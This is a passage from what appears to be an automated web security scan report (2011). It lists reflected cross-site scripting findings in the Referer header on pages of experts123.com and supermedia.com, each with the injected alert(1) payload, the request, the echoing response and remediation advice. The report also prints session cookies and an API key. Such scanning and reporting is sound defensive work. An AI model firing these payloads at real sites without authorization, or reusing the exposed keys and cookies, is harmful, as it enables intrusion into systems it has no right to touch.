This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dacf1"%3balert(1)//155dee88ae4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:56 GMT
Connection: close
Content-Length: 34659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "dacf1";alert(1)//155dee88ae4";
var RSQ = true;

$(function() {
experts123.Question.initialize(541537, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.680. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2ffb'%3balert(1)//2017b493094 was submitted in the Referer HTTP header. This input was echoed as c2ffb';alert(1)//2017b493094 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c2ffb'%3balert(1)//2017b493094

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=c2ffb';alert(1)//2017b493094');
});


</script>
...[SNIP]...

1.681. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6163"%3balert(1)//498765472fb was submitted in the Referer HTTP header. This input was echoed as d6163";alert(1)//498765472fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d6163"%3balert(1)//498765472fb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d6163";alert(1)//498765472fb";
var RSQ = true;

$(function() {
experts123.Question.initialize(202208, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.682. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-an-online-checking-account.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0800"%3balert(1)//0d9e6834871 was submitted in the Referer HTTP header. This input was echoed as d0800";alert(1)//0d9e6834871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d0800"%3balert(1)//0d9e6834871

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 33683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d0800";alert(1)//0d9e6834871";
var RSQ = true;

$(function() {
experts123.Question.initialize(626726, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.683. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-an-online-checking-account.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaeae'%3balert(1)//9e376e61a79 was submitted in the Referer HTTP header. This input was echoed as aaeae';alert(1)//9e376e61a79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aaeae'%3balert(1)//9e376e61a79

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=aaeae';alert(1)//9e376e61a79');
});


</script>
...[SNIP]...

1.684. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c11'%3balert(1)//0c64a2d8a24 was submitted in the Referer HTTP header. This input was echoed as 71c11';alert(1)//0c64a2d8a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71c11'%3balert(1)//0c64a2d8a24

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=71c11';alert(1)//0c64a2d8a24');
});


</script>
...[SNIP]...

1.685. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11ee8"%3balert(1)//0fd04f86b98 was submitted in the Referer HTTP header. This input was echoed as 11ee8";alert(1)//0fd04f86b98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11ee8"%3balert(1)//0fd04f86b98

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "11ee8";alert(1)//0fd04f86b98";
var RSQ = true;

$(function() {
experts123.Question.initialize(197790, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.686. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeb3b"%3balert(1)//3f4b39407ec was submitted in the Referer HTTP header. This input was echoed as aeb3b";alert(1)//3f4b39407ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aeb3b"%3balert(1)//3f4b39407ec

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "aeb3b";alert(1)//3f4b39407ec";
var RSQ = true;

$(function() {
experts123.Question.initialize(1075195, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.687. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2399d'%3balert(1)//1fd21ed3d2 was submitted in the Referer HTTP header. This input was echoed as 2399d';alert(1)//1fd21ed3d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2399d'%3balert(1)//1fd21ed3d2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=2399d';alert(1)//1fd21ed3d2');
});


</script>
...[SNIP]...

1.688. http://www.experts123.com/questions/ask [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /questions/ask

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b18'%3balert(1)//6e16c45e18f was submitted in the Referer HTTP header. This input was echoed as 95b18';alert(1)//6e16c45e18f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /questions/ask HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=95b18'%3balert(1)//6e16c45e18f

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 16:35:53 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:53 GMT
Connection: close
Content-Length: 11928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=95b18';alert(1)//6e16c45e18f');
});


</script>
...[SNIP]...

1.689. http://www.experts123.com/questions/filter/bank [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /questions/filter/bank

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a1d'%3balert(1)//1261bf759ea was submitted in the Referer HTTP header. This input was echoed as 93a1d';alert(1)//1261bf759ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /questions/filter/bank HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=93a1d'%3balert(1)//1261bf759ea

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:54 GMT
Connection: close
Content-Length: 49014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=93a1d';alert(1)//1261bf759ea');
});


</script>
...[SNIP]...

1.690. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/404.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60377</script><script>alert(1)</script>5e2b578442b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:14:04 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20813


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.691. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3575c"-alert(1)-"7068f2207e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:57 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8";
s.pageName="";
s.prop1="";
s.prop2="";
